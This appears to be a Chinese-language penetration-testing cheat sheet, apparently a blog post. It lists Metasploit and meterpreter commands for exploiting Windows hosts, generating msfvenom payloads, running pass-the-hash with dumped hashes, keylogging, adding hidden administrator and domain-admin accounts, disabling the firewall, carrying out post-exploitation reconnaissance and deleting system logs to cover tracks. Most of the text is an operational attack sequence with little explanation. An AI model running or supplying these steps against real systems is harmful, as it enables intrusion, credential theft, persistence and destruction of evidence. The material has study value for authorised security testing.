免责声明:本文仅做分享...
目录
Nessus官网
指定攻击
自动在线攻击
nmap扫
查看扫到的服务
查看主机
离线攻击
Msfvenom
本地快速传递文件的方法-->py
哈希传递攻击
提权
后渗透阶段
1-收集操作系统和版本信息
2-主机名称&环境变量
3-用户账户信息
4-远程端口
5-网络信息
6-应用程序和服务
7-注册表
8-系统权限
9-清理痕迹:
Nessus官网
可以联动MSF.
Tenable 风险暴露管理解决方案指南 | Tenable® (tenablecloud.cn)
试用7day
指定攻击
手工--命令
创建
--高级扫描
--设置名字,目标--开扫(简单的扫描)
search
use exploit/
show payloads
set windows/meterpreter/
>>tab键
bind一般不过
reverse
show options
set ........
set target ...(不填会默认帮你选)
exploit
meterpreter > sysinfo //看系统的信息
ctrl+C
background(挂起来)
sessions //看到拿下的所有会话
sessions ...
sessions -h
session -k id //踢掉会话
自动在线攻击
--先连接数据库欧...
自动化
nmap扫
查看扫到的服务
查看主机
db_autpwn.rb
/usr/share/Metasploit-Framework/plugins/
load xxx
自动干...(时间长)
db_autpwn -p -t -e
离线攻击
马子上
Msfvenom
Msfvenom是净荷生成和编码的组合,它在2015年6月8日取代了MsfPayload和MsfEncode这两个工具。
The advantages of msfvenom are(优点):
One single tool (一个单一的集成工具)
Standardizedcommandlineoptions(命令行选项标准化)
Increased speed(优化速度)
msfvenom -l payloads
msfvenom --help-formats
msfvenom -l encoders
马子自己上线吧
本地快速传递文件的方法-->py
在某个目录下运行:
python -m SimpleHTTPServer <port>
哈希传递攻击
meterpreter>run hashdump
use exploit/windows/smb/psexec
set
set smbuser <用户名>
set smbpass <hash值>
exploit
拿下后--->
sysinfo
getuid
ps --找管理员用的进程
migrate <进程号> --迁移权限
getuid
keyscan_start
run get_local_subnets //网络
添加路由,下一跳的流量给...
run getgui -e //打开win2008远程桌面
shell
net user xxx xxx /add
net user xxx xxx /add /domain
net localgroup administrators xxx
net localgroup administrators xxx /doamin
net group "域" xxx /add /domain
netsh firewall set opmode enable
netsh firewall set opmode disable
rdesktop <IP>
提权
脚本
MSF全自动:
http://t.csdnimg.cn/7qKYy
CS半自动
域控提权: CVE + 票据
klist purge
klist
后渗透阶段
--得到点东西
(手工/工具)
命令
脚本
1-收集操作系统和版本信息
systeminfo
systeminfo | findstr /B /C:"OS <Name>"
2-主机名称&环境变量
hostname
set
3-用户账户信息
net user #查看本地所有用户账户
net localgroup 查看本地所有用户组
netuser/domain 查看域用户账户
net group/domain 查看域用户组
net group "Domain Admins"/domain 查看特定域组中的用户
4-远程端口
netstat -ano | more 查看开放端口与连接
5-网络信息
ipconfig /all 查看网络配置
route print I 查看路由表
arp -a 查看ARP缓存
6-应用程序和服务
wmic product list brief
查看当前已安装的应用程序
7-注册表
直接读取密码?!
Password – Penetration Testing Lab (pentestlab.blog)
8-系统权限
cacls
cacls c:\
wmic > process where name="进程名称.exe" list full
# 显示进程的详细信息
9-清理痕迹:
del %WINDIR%*.log /a/s/q/f
# 强制静默删除只读文件